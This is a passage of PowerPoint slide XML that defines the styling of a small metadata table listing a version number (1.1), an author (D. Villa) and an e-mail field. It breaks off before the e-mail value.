        <p:nvGraphicFramePr>
          <p:cNvPr id="124990" name="Group 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B29E1B27-9968-C664-167E-267F5CE28173}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1946522440"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2650331" y="3573016"/>
          <a:ext cx="6891338" cy="2531120"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2024063">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4867275">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="341188">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:schemeClr val="tx2"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2800">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:schemeClr val="accent1"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2400">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="66CC00"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2000">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl5pPr>
                      <a:lvl6pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl6pPr>
                      <a:lvl7pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl7pPr>
                      <a:lvl8pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl8pPr>
                      <a:lvl9pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>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tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Version</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="90000" marT="46769" marB="467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70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2800">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:schemeClr val="accent1"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2400">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="66CC00"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2000">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl5pPr>
                      <a:lvl6pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl6pPr>
                      <a:lvl7pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl7pPr>
                      <a:lvl8pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl8pPr>
                      <a:lvl9pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>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tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>1.1</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="90000" marT="46769" marB="467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671068">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:schemeClr val="tx2"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2800">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:schemeClr val="accent1"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2400">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="66CC00"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2000">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl5pPr>
                      <a:lvl6pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl6pPr>
                      <a:lvl7pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl7pPr>
                      <a:lvl8pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl8pPr>
                      <a:lvl9pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>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tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Author(s)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="90000" marT="46769" marB="467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70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2800">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:schemeClr val="accent1"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2400">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="66CC00"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2000">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl5pPr>
                      <a:lvl6pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl6pPr>
                      <a:lvl7pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl7pPr>
                      <a:lvl8pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl8pPr>
                      <a:lvl9pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>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tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>D. Villa</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="90000" marT="46769" marB="467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41188">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:schemeClr val="tx2"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2800">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:schemeClr val="accent1"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2400">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="66CC00"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2000">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl5pPr>
                      <a:lvl6pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl6pPr>
                      <a:lvl7pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl7pPr>
                      <a:lvl8pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl8pPr>
                      <a:lvl9pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>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tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>E-mail</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="90000" marT="46769" marB="467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70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2800">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:schemeClr val="accent1"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2400">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="66CC00"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2000">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl5pPr>
                      <a:lvl6pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
